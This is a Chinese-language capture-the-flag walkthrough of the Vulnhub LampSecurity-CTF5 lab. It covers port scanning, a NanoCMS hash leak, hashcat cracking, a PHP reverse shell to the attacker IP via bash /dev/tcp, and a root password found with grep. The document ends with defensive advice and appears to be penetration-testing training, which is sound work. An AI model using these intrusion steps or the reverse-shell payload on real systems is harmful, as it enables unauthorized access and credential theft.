Vulnhub靶机实操笔记-LampSecurity-CTF5
字数 1284 2025-08-10 19:49:05

LampSecurity-CTF5 靶机渗透测试实战教程

一、环境准备与信息收集

1. 靶机信息

  • 靶机名称: LampSecurity-CTF5
  • 下载链接: Vulnhub LampSecurity-CTF5
  • 网络配置: 桥接模式,IP地址为192.168.32.142

2. 攻击机准备

  • Kali Linux 或其他渗透测试发行版
  • 确保安装了以下工具:
    • nmap
    • hashcat
    • searchsploit
    • netcat

二、初始扫描与端口探测

1. 主机存活判断

sudo nmap -sn 192.168.32.0/24

2. 快速端口扫描

sudo nmap --min-rate 10000 -p- 192.168.32.142 -oA report/min-rate

参数说明:

  • --min-rate 10000: 以不低于10000包/秒的速度扫描
  • -p-: 扫描所有端口(1-65535)
  • -oA: 将结果输出为所有格式(.nmap, .gnmap, .xml)

3. TCP服务扫描

sudo nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,52385 192.168.32.142

参数说明:

  • -sT: TCP连接扫描
  • -sV: 服务版本探测
  • -O: 操作系统探测
  • -p: 指定端口扫描

4. UDP服务扫描

sudo nmap -sU -p22,25,80,110,111,139,143,445,901,3306,52385 192.168.32.142 -oA report/heavy-U

5. 漏洞脚本扫描

sudo nmap --script=vuln -p22,25,80,110,111,139,143,445,901,3306,52385 192.168.32.142

扫描结果显示存在SQL注入漏洞。

三、Web应用分析

1. NanoCMS识别

访问80端口发现系统为NanoCMS。

2. 漏洞搜索

searchsploit nanocms

发现存在RCE漏洞但需要认证。

3. 信息泄露漏洞利用

通过Google搜索发现NanoCMS存在信息泄露漏洞,访问特定路径可获取密码hash:

http://192.168.32.142/nano/admin/backup.php

获取到:

  • 用户名: admin
  • 密码hash: 9d2f75377ac0ab991d40c91fd27e52fd

4. Hash类型识别

hash-identifier '9d2f75377ac0ab991d40c91fd27e52fd'

结果显示最可能是MD5加密。

5. Hashcat破解

sudo hashcat -m 0 -a 0 9d2f75377ac0ab991d40c91fd27e52fd /usr/share/wordlists/rockyou.txt

参数说明:

  • -m 0: MD5 hash类型
  • -a 0: 字典攻击模式

破解结果: 密码为shannon

6. 登录NanoCMS

使用凭证admin:shannon成功登录系统。

四、获取初始访问

1. 植入反向Shell

修改现有PHP页面内容为:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.32.131/1234 0>&1'");?>

2. 监听反弹Shell

在攻击机上:

nc -lvnp 1234

3. 访问修改后的页面获取Shell

五、权限提升

1. 系统信息收集

uname -a

查看系统内核版本等信息。

2. 检查sudo权限

sudo -l

3. 用户信息收集

cat /etc/passwd

4. 查找敏感信息

grep -R -i pass /home/* 2>/dev/null

发现文件:

/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note

内容包含root密码: 50$cent

5. 获取交互式Shell

python -c "import pty;pty.spawn('/bin/sh')"

6. 切换root用户

su -

输入密码50$cent成功获取root权限。

六、总结与关键点

  1. 信息收集阶段:

    • 全面扫描端口和服务
    • 识别Web应用类型和版本
    • 使用searchsploit查找已知漏洞
  2. Web应用攻击:

    • 利用信息泄露漏洞获取凭证hash
    • 使用hashcat破解MD5 hash
    • 通过认证后植入反向Shell
  3. 权限提升:

    • 系统性地检查用户历史记录和配置文件
    • 在用户目录中查找敏感信息
    • 获取root密码后完成提权
  4. 关键工具使用:

    • nmap进行主机发现和服务识别
    • hashcat进行密码破解
    • searchsploit查找公开漏洞
    • netcat建立反向连接
  5. 防御建议:

    • 避免使用弱密码和常见密码
    • 及时更新CMS系统
    • 限制敏感信息的存储位置
    • 实施最小权限原则
LampSecurity-CTF5 靶机渗透测试实战教程 一、环境准备与信息收集 1. 靶机信息 靶机名称: LampSecurity-CTF5 下载链接: Vulnhub LampSecurity-CTF5 网络配置: 桥接模式,IP地址为192.168.32.142 2. 攻击机准备 Kali Linux 或其他渗透测试发行版 确保安装了以下工具: nmap hashcat searchsploit netcat 二、初始扫描与端口探测 1. 主机存活判断 2. 快速端口扫描 参数说明: --min-rate 10000 : 以不低于10000包/秒的速度扫描 -p- : 扫描所有端口(1-65535) -oA : 将结果输出为所有格式(.nmap, .gnmap, .xml) 3. TCP服务扫描 参数说明: -sT : TCP连接扫描 -sV : 服务版本探测 -O : 操作系统探测 -p : 指定端口扫描 4. UDP服务扫描 5. 漏洞脚本扫描 扫描结果显示存在SQL注入漏洞。 三、Web应用分析 1. NanoCMS识别 访问80端口发现系统为NanoCMS。 2. 漏洞搜索 发现存在RCE漏洞但需要认证。 3. 信息泄露漏洞利用 通过Google搜索发现NanoCMS存在信息泄露漏洞,访问特定路径可获取密码hash: 获取到: 用户名: admin 密码hash: 9d2f75377ac0ab991d40c91fd27e52fd 4. Hash类型识别 结果显示最可能是MD5加密。 5. Hashcat破解 参数说明: -m 0 : MD5 hash类型 -a 0 : 字典攻击模式 破解结果: 密码为 shannon 6. 登录NanoCMS 使用凭证 admin:shannon 成功登录系统。 四、获取初始访问 1. 植入反向Shell 修改现有PHP页面内容为: 2. 监听反弹Shell 在攻击机上: 3. 访问修改后的页面获取Shell 五、权限提升 1. 系统信息收集 查看系统内核版本等信息。 2. 检查sudo权限 3. 用户信息收集 4. 查找敏感信息 发现文件: 内容包含root密码: 50$cent 5. 获取交互式Shell 6. 切换root用户 输入密码 50$cent 成功获取root权限。 六、总结与关键点 信息收集阶段 : 全面扫描端口和服务 识别Web应用类型和版本 使用searchsploit查找已知漏洞 Web应用攻击 : 利用信息泄露漏洞获取凭证hash 使用hashcat破解MD5 hash 通过认证后植入反向Shell 权限提升 : 系统性地检查用户历史记录和配置文件 在用户目录中查找敏感信息 获取root密码后完成提权 关键工具使用 : nmap进行主机发现和服务识别 hashcat进行密码破解 searchsploit查找公开漏洞 netcat建立反向连接 防御建议 : 避免使用弱密码和常见密码 及时更新CMS系统 限制敏感信息的存储位置 实施最小权限原则